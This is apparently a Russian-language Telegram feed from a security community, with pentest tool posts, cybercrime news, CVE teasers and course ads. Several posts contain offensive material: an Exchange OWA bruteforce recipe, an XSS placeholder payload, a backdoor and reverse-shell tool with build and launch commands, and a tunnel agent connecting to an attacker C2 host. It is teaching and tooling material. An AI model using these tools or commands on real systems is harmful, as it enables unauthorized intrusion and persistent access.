Codeby
36.3K subscribers
2.09K photos
98 videos
12 files
7.87K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy

CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
🎇 SysReptor

Полностью настраиваемая платформа для составления отчетов о тестировании на проникновение, предназначенная для специалистов в области кибербезопасности.


❗️Решает одну из ключевых проблем, (которую так не любят делать технические специалисты) — стандартизацию и автоматизацию отчётности.

🧿Основные возможности
⏺️поддержка Markdown;
⏺️полная кастомизация через HTML и CSS;
⏺️поддержка экспорта в PDF;
⏺️развертывание на собственном сервере или в облаке.

⬇️Установка
Устанавливаем дополнительные компоненты, Docker и скачиваем установочный скрипт инструмента:
sudo apt update
sudo apt install -y sed curl openssl uuid-runtime coreutils
curl -fsSL https://get.docker.com | sudo bash
bash <(curl -s https://docs.sysreptor.com/install.sh)

Веб-приложение будет доступно по адресу http://127.0.0.1:8000/

🔑Разработка отчетов
Конструктор отчетов позволяет полностью настроить внешний вид и структуру итоговых отчетов в формате PDF. Ограничений по дизайну нет, поэтому вы можете адаптировать отчеты под свои нужды.

Существует два основных подхода к созданию отчетов:
1️⃣ Начать с существующего шаблона (скопировать существующий шаблон отчета из раздела и изменить его в соответствии со своими требованиями).
2️⃣ Начать создавать отчет нуля:
➡️определить поля отчета и поля находок (уязвимостей);
➡️определить базовую структуру отчета в редакторе макетов;
➡️настроить HTML и CSS в соответствии со своими потребностями с помощью редакторов кода.

Существует возможность использовать также и готовые фрагменты HTML и CSS, которые упрощают процесс создания отчетов. Они содержат часто используемые элементы отчетов (титульный лист, верхний и нижний колонтитулы, оглавление, список выводов, приложения и т. д.), которые можно легко настроить в соответствии с конкретными потребностями.

🔁Шаблоны уязвимостей
Одна из самых полезных функций для ИБ-специалистов, которая позволяет ускорить дальнейшую подготовку отчетов. Они содержат общие описания результатов и уязвимостей. Таким образом, описав результаты один раз в шаблоне, далее можно использовать их в различных отчетах.

#tools #reports #pentesting

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
7🔥5👍4
🖥️ Legba v1.2.0

Быстрый брутфорсер с поддержкой большого количества протоколов, написан на Rust

Установка:

cargo install legba


Пример HTTP basic auth:

legba http.basic \
--username admin \
--password wordlists/passwords.txt \
--target http://localhost:8888/


Поддерживает YAML в качестве шаблонов настройки

legba \
-R cookbook/http/ms-exchange/owa.yml \
-U users.txt \
-P passwords.txt \
"host=ms-server.local"


description: Microsoft Exchange bruteforce via OWA endpoint.
author: evilsocket
plugin: http
args:
target: "{$schema or https}://{$host}:{$port or 443}/owa/auth.owa"
http-method: POST
http-success-codes: 302
http-success-string: set-cookie
http-payload: destination={$schema or https}://{$host}:{$port or 443}/&flags=4&username={USERNAME}&password={PASSWORD}


💻 Repo
💻 Docs
💻 Recipes

#legba #soft #rust #brute

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍5🔥5👏2
🔁 Пятничный опрос
Сегодня проверим, насколько ты ориентируешься в nmap

Подсказка:
nmap - это утилита для сканирования сети, которая используется для обнаружения хостов, открытых портов, сервисов и их версий, а также анализа безопасности сети.
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥5👍4
какой флаг отвечает за определение версий сервисов?
Anonymous Poll
6%
-sS
6%
-O
85%
-sV
2%
-p-
👍11🔥85💯3
Forwarded from Hacker Lab
🚩 Новые задания на платформе HackerLab!

🌍 Категория ВебМузей
——————————————

🗂 В архив добавлены задания + райтапы:

🔵Веб - RevengeNinja

Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥137👍6
🔑 Gixy-Next — инструмент для анализа безопасности конфигураций Nginx

Gixy — это open source-анализатор конфигураций Nginx, который помогает находить потенциальные уязвимости, ошибки и небезопасные настройки. Инструмент особенно полезен как для DevOps задач так и для проведения пентеста web-инфраструктуры. Он автоматически проверяет конфигурационные файлы и выявляет проблемы, которые могут привести к утечкам данных, обходу ограничений или выполнению вредоносных запросов.


Основные возможности
📉 Анализ конфигураций Nginx — поиск небезопасных директив и ошибок
📉 Обнаружение уязвимостей — выявляет SSRF, open redirect, header injection и др.
📉 Проверка include-файлов — анализирует всю цепочку конфигураций
📉 Плагины — расширяемая система проверок
📉 Простой запуск — не требует сложной настройки
🖱 Быстрая проверка — подходит для CI/CD и автоматизации

Как работает Gixy
Gixy анализирует конфигурацию Nginx и применяет набор правил для поиска проблем:
▶️ парсинг nginx.conf и include-файлов
▶️ анализ директив и их комбинаций
▶️ проверка потенциально опасных паттернов
▶️ выявление логических ошибок конфигурации

Инструмент находит проблемы, связанные с:
⏺️SSRF
⏺️Open Redirect
⏺️Unsafe proxy_pass
⏺️Header Injection

🧾 Пример использования
Установка
pip3 install gixy-next


Запуск проверки
gixy /etc/nginx/nginx.conf


Проверка директории
gixy /etc/nginx/


#nginx #security #devops #pentest #web #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
12🔥6👍5
🙃🥰🤣🤪😄
Пользуясь случаем, хотим поделиться с вами мощным отзывом на наш курс по веб-пентесту!

Один из наших выпускников подробно разобрал, как проходит обучение, что реально даёт результат и почему курс часто рекомендуют даже опытные специалисты, за что мы очень благодарны!
👉 обучение строится вокруг практики — от SQLi и XSS до SSRF, SSTI, CMDi, LFI и построения цепочек до RCE

👉 каждую неделю проходят вебинары с куратором, где можно разобрать сложные моменты и задать любые вопросы

👉 обратная связь не формальная — наставники помогают 24/7

👉 финальный модуль — полноценная практика ручного поиска уязвимостей


Получился максимально подробный и честный отзыв: https://teletype.in/@fnay_offensive/post_20

Новый поток стартует 16 апреля.
В программе — практические задания, регулярные вебинары с кураторами и постепенное погружение в сценарии эксплуатации.

➡️➡️➡️Подробнее

#отзывы

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍8🔥8👎3🍌1
👮 Россия арестовала киберпреступника!

⏺️ В России арестован администратор LeakBase за масштабную операцию кражи учетных данных.

🪧 По данным ТАСС и новостного сайта МВД, подозреваемый является жителем города Таганрога. Сообщается, что он был задержан за создание и управление криминальным сайтом, позволявшим торговать украденными личными базами данных с 2021 года.

🕸 «На платформе хранились сотни миллионов учетных записей пользователей, банковские реквизиты, имена пользователей и пароли, а также корпоративные документы, полученные путем взлома», — заявил официальный представитель МВД России. «Более 147 000 пользователей, зарегистрированных на форуме, могли покупать и продавать эти данные, а также использовать их для совершения мошеннических действий против граждан».

🌐 Министерство юстиции США заявило, что этот форум для киберпреступников был одним из крупнейших в мире центров, где киберпреступники покупали и продавали украденные данные и инструменты для киберпреступлений.

💵 Данный форум включал сотни миллионов учетных данных и финансовой информации, такой как номера кредитных и дебетовых карт, банковские счета, имена пользователей и связанные с ними пароли, которые могли быть использованы для осуществления атак с целью захвата учетных записей.

❗️ Теперь посетителей сайта встречает сообщение: «В ходе специальной операции Бюро специальных технических мероприятий Министерства внутренних дел России форум LeakBase был закрыт навсегда. Незаконные действия в сфере компьютерной информации, а также нарушения конституционных прав и свобод личности и граждан влекут за собой уголовную ответственность в соответствии с российским законодательством».

Как вы считаете, доведут дело до конца?

#leakbase #russia #police

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19👀75🔥5👎3
ParamSpider: Инструмент для извлечения URL из веб-архивов

ParamSpider — утилита с открытым исходным кодом, предназначенная для извлечения URL-адресов, связанных с целевым доменом, из веб-архивов (Wayback Machine). Инструмент автоматически фильтрует «неинтересные» URL, позволяя исследователям безопасности сосредоточиться на потенциально значимых конечных точках для дальнейшего анализа, фаззинга и тестирования.


👉Основные функции
- Cбор ссылок из Wayback Machine для указанного домена
- Автоматическое исключение статических и неинтересных расширений (изображения, стили, скрипты)
- Поддержка сканирования нескольких доменов из файла
- Отображение URL в реальном времени
- Возможность работы через прокси-сервер
- Замена значений параметров для последующего фаззинга

⬇️Установка
sudo apt install paramspider

Проверка
paramspider -h


⏺️Поиск URL для одного домена
paramspider -d example.com

Результат сохраняется в файл results/example.com.txt

⏺️Поиск URL для нескольких доменов из файла
paramspider -l domains.txt

Файл domains.txt должен содержать список доменов (по одному на строку)

⏺️Потоковый вывод в терминал
paramspider -d example.com -s

URL отображаются в реальном времени без сохранения в файл

⏺️Использование прокси
paramspider -d example.com --proxy '127.0.0.1:7890'


⏺️Настройка плейсхолдера для параметров
paramspider -d example.com -p '"><h1>reflection</h1>'

Значение плейсхолдера используется для замены значений параметров, что удобно для последующего тестирования на XSS или другие инъекции

🔎ParamSpider часто используется в комбинации с инструментами для:
- Фаззинга параметров (ffuf, wfuzz)
- Проверки доступности (httpx, httprobe)
- Сканирования уязвимостей (nuclei, dalfox)
- Анализа параметров (kxss, gf)

#ParamSpider #Fuzzing #WaybackMachine #pentest #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥76
🎯 enject — защита .env секретов от утечек через AI и код

enject — это open source-инструмент, который скрывает чувствительные данные из .env файлов, предотвращая их утечку при работе с AI, логированием и сторонними сервисами. Ранее проект назывался enveil.



🕸 Идея инструмента
Вместо хранения секретов в открытом виде:
👉 значения подменяются/маскируются
👉 доступ к ним контролируется
👉 реальные данные не попадают в сторонние системы

❗️ Даже если код обрабатывается AI — секреты остаются скрытыми


🧠 Основные возможности
↗️ Защита .env — скрывает API-ключи, токены и пароли
↗️ Anti-AI leakage — предотвращает утечки в LLM/IDE/логирование
↗️ Минимальные изменения — не требует полной переработки проекта
↗️ Open-source — можно проверить и адаптировать под свою инфраструктуру

Как работает enject
Инструмент действует как промежуточный слой между приложением и секретами:
⏺️ перехватывает обращения к переменным окружения
⏺️ подменяет реальные значения безопасными представлениями
⏺️ возвращает настоящие данные только в нужный момент

В результате:
▶️секреты не «светятся» в коде
▶️не попадают в AI-запросы
▶️не утекут через логи или дебаг


⛓️‍💥 Базовый сценарий использования

Клонирование репозитория
git clone https://github.com/greatscott/enject
cd enject
cargo build --release


Настройка окружения
cd your-project
enject init


Дальше инструмент интегрируется в процесс запуска приложения и начинает фильтровать доступ к секретам.

#security #devsecops #env #secrets #privacy #ai #tool #infosec

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
10🔥7👍3🤔3
Tyrant

Tyrant — это вредоносный инструмент, используемый для тестирования на проникновение и обеспечения постоянного присутствия под удаленным управлением, обладающий обширными возможностями.


📐Основные характеристики:
📉Reverse shell: позволяет злоумышленнику инициировать сеанс командной оболочки с указанным UID пользователя, получая соответствующие привилегии.
📉Внедрение и сохранение бэкдора: внедряет бэкдор в целевую систему и обеспечивает сохранение контроля даже после перезагрузки системы.
📉Загрузка веб-оболочки Tyrant: загружает и запускает обратную оболочку Tyrant через веб-доступ.
📉Шифрование и поддельные протоколы: использует поддельные токены JWT и зашифрованную связь для обхода обнаружения системы безопасности.
🖱Восстановление по SSH: позволяет злоумышленнику повторно подключиться и восстановить бэкдор через SSH.

⬇️Установка:
0️⃣Клонирование репозитория и переход в рабочую директорию:
git clone https://github.com/MartinxMax/Tyrant.git

cd Tyrant/


1️⃣Установка зависимостей:
sudo apt-get install zlib1g-dev libzstd-dev libssl-dev


2️⃣Компиляция бинарного файла:
gcc -static -o tyrant tyrant.c ./lib/core.c ./lib/random_md5.c -lssl -lcrypto -lz -lzstd


⛓️‍💥Запуск:
./tyrant -uid [UID] -rhost [RHOST] -rport [RPORT]


#web

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍7🔥7
🚨 Российский хакер арестован!

🔗 Российский хакер приговорен к 2 годам лишения свободы за атаки с использованием ботнета TA551, распространявшего программу-вымогатель.

🎇 Министерство юстиции США сообщило*, что гражданин России приговорен к двум годам лишения свободы за управление ботнетом, который использовался для осуществления атак с применением программ-вымогателей против американских компаний.

🪧 40-летний Илья Ангелов из Тольятти (нет, не Италия) также был оштрафован на 100 000 долларов. Ангелов, использовавший в сети псевдонимы «milan» и «okart», предположительно, в период с 2017 по 2021 год был соруководителем российской киберпреступной группы, известной как TA551 (также известной как ATK236, G0127, Gold Cabin, Hive0106, Mario Kart, Monster Libra, Shathak и UNC2420 ).

💵 Главной целью атак была перепродажа доступа другим преступным группам, которые использовали его для вымогательства с помощью программ-вымогателей. В период с августа 2018 года по декабрь 2019 года TA551 предоставила группе BitPaymer, занимавшейся распространением программ-вымогателей, доступ к своему ботнету, что позволило этой группировке атаковать 72 американских корпораций. В результате было выплачено более 14,17 миллионов долларов в виде вымогательских платежей.

✉️ В феврале 2021 года, фишинговые электронные письма, содержащие защищенные паролем архивы, обманом заставляли получателей открывать документы Microsoft Word с поддержкой макросов, что приводило к развертыванию программы для загрузки макросов под названием MOUSEISLAND. Вредоносное ПО служило каналом для вторичной полезной нагрузки, получившей кодовое название PHOTOLOADER, которая, в конечном итоге, установила IcedID. И MOUSEISLAND, и PHOTOLOADER приписываются TA551.

Источник: https://www.justice.gov/usao-edmi/pr/russian-cybercriminal-sentenced-prison-using-botnet-steal-millions-american-businesses

#russia #usa #hacker #ta551

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
15😁11🔥5👍4😍3👀2👌1
☁️ADPulse

Инструмент с открытым исходным кодом, предназначенный для аудита безопасности Active Directory, который подключается к контроллеру домена и выполняет 35 автоматических проверок безопасности. Дает быструю оценку неправильных конфигураций Active Directory, а также ищет уязвимые места в инфраструктуре.


Вместе со сканером безопасности на странице инструмента также представлен скрипт PowerShell с названием test_environment.ps1, с помощью которого можно настроить собственный уязвимый контроллер домена для проведения тестирования.

Как это работает?
1️⃣Подключение — ADPulse связывается с целевым контроллером домена по протоколу LDAPS (порт 636) с автоматическим переключением на LDAP (порт 389). Попытка аутентификации осуществляется с помощью NTLM и протокола SIMPLE bind.
2️⃣Сканирование — каждая из 35 функций проверки запрашивает данные из AD через LDAP и, в случае определенных проверок, выполняет дополнительные операции: легкие сетевые проверки (SMBv1, подписание, нулевые сессии) обнаруженных хостов, обход файловой системы SYSVOL для определения учетных данных GPP и анализ данных DACL для проверок, связанных с ACL.
3️⃣Оценка — результатам присваивается степень критичности и вычитается определенное количество баллов из общей оценки.

Все операции выполняются только с доступом на чтение. ADPulse не изменяет объекты Active Directory, членство в группах, объекты групповой политики или списки управления доступом.

⬇️Установка
# Клонируем репозиторий
git clone https://github.com/yourorg/adpulse.git
cd adpulse

# (Recommended) Создаем виртуальное окружение
python -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows

# Устанавливаем зависимости
pip install -r requirements.txt


Форматы отчетов
➡️Вывод в консоль — вывод в терминале с цветовой кодировкой, позволяющий быстро увидеть критические результаты и ключевые моменты;
➡️JSON — машиночитаемый экспорт для интеграции с системами управления ИБ и событиями безопасности, системами обработки заявок или пользовательскими информационными панелями;
➡️HTML — автономный отчет в темной цветовой гамме со сворачиваемыми разделами, значками уровня критичности, карточками со статистикой, шкалой оценки и списком шаблонов ADCS.

🧿Оценка уровня критичности обнаружений
За каждую обнаруженную мисконфигурацию вычитается определенное количество баллов. Общая оценка начинается со 100 и уменьшается за каждое обнаружение:
📉 80–100 — Низкий — хорошая система безопасности c незначительными проблемами;
📉 60–79 — Средний — существенные недостатки, которые необходимо устранить;
📉 40–59 — Высокий — присутствуют значительные уязвимости;
🖱 0–39 — Критический — серьезные риски, которые требуют немедленного устранения.

Использование
❗️ Для работы с ADPulse требуются действительные учетные данные домена.

1️⃣ Базовое сканирование. Все три формата отчетов по умолчанию создаются в папке Reports/.
python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!'


2️⃣ Сканирование с указанием IP DC, генерацией отчета только в формате HTML в директории /tmp/scans.
python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!' --dc-ip 10.0.0.1 --report html --output-dir /tmp/scans


#tools #AD #pentesting #infrastructure

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥6👍4
Один клик — и роутер под контролем атакующего

💀 Открыл письмо, кликнул по ссылке — браузер молча отправил POST-запрос на 192.168.1.1. Без пароля. Без уведомления. Добро пожаловать в CVE-2025-15101.

🔍 Связка CSRF + OS Command Injection в роутерах ASUS (прошивка 3.0.0.6_102 и ниже) даёт атакующему root shell через браузер жертвы. Почему это критично:

• httpd на ASUS работает от root — команды уходят сразу с максимальными привилегиями
• сессия админа в AsusWRT не истекает часами — окно атаки всегда открыто
• нет WAF, CSP, SIEM — атака проходит в тишине

⚠️ Аналогичный паттерн в AsusWRT фиксировали ещё в 2018-м. Номера CVE меняются — архитектура нет.

Полный разбор kill chain, лабораторный стенд и чеклист митигации:

https://codeby.net/threads/cve-2025-15101-csrf-os-command-injection-v-routerakh-asus-polnaya-karta-uyazvimosti-ot-klika-do-root-shell.92554/
👍97🔥4🤯1
🌐 MESH — P2P-сеть для удалённой криминалистика Android в любой точке мира

MESH — это open source-инструмент для удалённой форензики мобильных устройств и сетевого мониторинга через зашифрованную peer-to-peer сеть. Он позволяет анализировать устройства (Android / iOS), даже если к ним нет прямого доступа.


🧠 Идея инструмента
Вместо VPN и централизованных серверов используется overlay mesh-сеть:
▶️устройства выглядят как будто находятся в одной локальной сети
▶️соединение строится напрямую между узлами
▶️нет единой точки отказа

В основе — модифицированный протокол Tailscale с self-hosted control plane и разделением управления и трафика.

🧿Основные возможности
📉 P2P форензика — анализ устройств через прямые соединения без проброса портов
📉 End-to-end шифрование — WireGuard / AmneziaWG с автоматическим управлением ключами
📉 Обход DPI и цензуры — обфускация трафика + fallback на HTTPS-реле
📉 CGNAT bypass — устройства получают виртуальные адреса и работают как в одной сети
📉 Интеграция с инструментами — MVT, AndroidQF, ADB, libimobiledevice
📉 Kill-switch — изоляция устройства во время анализа
🖱 Ephemeral-сети* — быстрое создание и уничтожение forensic-сессий

*Ephemeral-сети — это временные сети, которые создаются под конкретную задачу


☁️ Как работает MESH

MESH создаёт распределённую сеть из трёх компонентов:

⏺️ Control plane — координация узлов и обмен ключами
⏺️ Analyst node — машина исследователя
⏺️ Endpoint — целевое устройство (Android/iOS)

При этом:
➡️ трафик идёт напрямую между узлами
➡️ control plane не участвует в передаче данных
➡️ при блокировке UDP используется HTTPS relay

Это позволяет:
➡️ обходить NAT
➡️ скрывать активность от DPI
➡️ работать в цензурированных средах

🧾 Базовый сценарий использования

1️⃣ Клонирование репозитория
git clone https://github.com/BARGHEST-ngo/MESH.git
cd mesh/control-plane


2️⃣ Запуск control plane
docker-compose up -d


3️⃣ Доступ к веб-интерфейсу
https://localhost:3000/login

4️⃣ Создание API-ключа
docker exec headscale headscale apikeys create --expiration 90d

После этого можно подключать устройства и начинать форензику.

#mesh #p2p #forensics #mobile #privacy #security #blueteam #dfir #threatintel

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍8🔥8🤔2🌚1
🔁 ligolo-ng

Простой, легкий и быстрый инструмент, который позволяет пентестерам создавать туннели на основе обратного TCP/TLS-соединения с использованием интерфейса tun (без необходимости в SOCKS). Поддерживаются протоколы TCP, UDP, ICMP.


👉 Принцип работы
Пакеты, отправляемые в TUN-интерфейс при запуске прокси-сервера, транслируются и затем передаются в удалённую сеть агента.

Например, для TCP-соединения процесс работает следующим образом:
⏺️SYN-пакеты преобразуются в системный вызов connect() на удалённой стороне.
⏺️Если connect() выполняется успешно, обратно отправляется SYN-ACK.
⏺️Если после вызова connect() возвращаются ошибки ECONNRESET, ECONNABORTED или ECONNREFUSED, отправляется RST-пакет.
⏺️Если соединение завершается тайм-аутом, никакого ответа не отправляется.

Такой механизм позволяет использовать инструменты, например Nmap, без необходимости использования proxychains.

📐Характеристики
📉Удобный пользовательский интерфейс с возможностью выбора агента и отображением информации о сетевых соединениях;
📉Автоматическая настройка сертификата с использованием Let's Encrypt;
📉Агент не требует повышенных привилегий на целевой системе;
📉Поддержка одновременной работы с несколькими туннелями;
📉Поддержка WebSocket-соединений;
📉Поддержка режимов reverse-подключения и bind-подключения.

🔎 Установка
Можно произвести установку из репозитория Kali Linux : apt install ligolo-ng.
Или собрать через go:
go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go


➡️Использование
При использовании в Linux необходимо создать интерфейс tun на прокси-сервере:
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up


Далее необходимо запустить прокси-сервер на своем сервере (порт по умолчанию 11601):
./proxy -autocert 
./proxy -selfcert


После этого запускается агент на целевой системе:
./agent -connect attacker_c2_server.com:11601


После подключения агента на прокси-сервере появится новая сессия:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000


Через команду session необходимо выбрать нужного агента и далее запустить туннелирование на прокси-сервере, используя имя интерфейса.

❗️С версии 0.8 в инструменте поддерживается управление через веб-интерфейс.

#tools #tun #pentest #network

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
12👍8🔥6
Друзья, напоминаем, на каких курсах начинается обучение в апреле! 🚗

Старт 6 апреля:
🙂🙃😄🥲🙂☺️😀 ⤵️
Курс «Профессия аналитик центра мониторинга безопасности (SOC)»запускаем новый курс. Это возможность войти в профессию с нуля: на курсе освоите работу с инцидентами ИБ, научитесь выявлять атаки и анализировать события.

Старт 16 апреля:
Курс «Тестирование Веб-приложений на проникновение (WAPT)»отработаем полный цикл тестирования: от разведки до пост-эксплуатации.

Старт 20 апреля:

Курс «OSINT: технология боевой разведки» освоим профессиональный поиск информации и анализ данных из открытых источников.

Старт 27 апреля:
Курс «Профессия DevSecOps - инженер: безопасная разработка»освоим DevSecOps-инженерию: от автоматизации безопасности до работы с Kubernetes и Terraform.
Курс «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)» ищем и анализируем следы кибервзломов (анализ артефактов, работа с opensource инструментами).

🪧Запишитесь у нашего менеджера @CodebyAcademyBot

Или узнайте подробности и программы курсов — на нашем
➡️ сайте
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍63🔥2
Codeby pinned a photo
Forwarded from Hacker Lab
🚩 Новые задания на платформе HackerLab!

👩‍💻 Категория Pentest MachinesГрузоперевозки

Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍5🔥3
Forwarded from Hacker Lab
❗️ Сертификаты в HackerLab

В HackerLab запускается сертификация. На текущий момент сертификат доступен участникам, успешно завершившим курс SQL Injection Master и сдавшим итоговый экзамен.

Экзамен представляет собой практическую эксплуатацию уязвимостей в изолированной инфраструктуре. Вы не отвечаете на вопросы - вы атакуете систему, находите уязвимости и шаг за шагом развиваете атаку.

Это не просто «галочка», а результат, подтверждённый практикой.

🎁 В честь запуска сертификации дарим промокод на скидку 20% для подписки PRO. Действует до 30 апреля:
PRO20


➡️ Подробности и программа курса
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🔥94👎2🎉2😎1
Zero-click через стикер: 9.8 и молчание Telegram

Получил стикер — устройство скомпрометировано. Без клика, без уведомления. Именно это описывает ZDI-CAN-30207 — и именно это Telegram отрицает.

🔍 Оценка CVSS 9.8 — не маркетинг. Математика за ней конкретна: метрика UI:N (zero-click) даёт коэффициент 0.85 вместо 0.62 при клике. Разница — 9.8 против 8.1. Оба сценария критичны, но zero-click означает массовую эксплуатацию без единого действия жертвы.

⚙️ Аналог по вектору — CVE-2019-3568, buffer overflow в WhatsApp VoIP: идентичный CVSS, идентичная схема. Статус ZDI-CAN-30207 сейчас — disputed: ZDI верифицировал, вендор отрицает. Разбираем CVSS-математику, хронологию disclosure и методы инструментирования клиента для мониторинга.

Полный разбор:
https://codeby.net/threads/zero-day-v-telegram-zdi-can-30207-razbor-uyazvimosti-telegram-zero-day-s-otsenkoi-cvss-9-8.92557/
6❤‍🔥1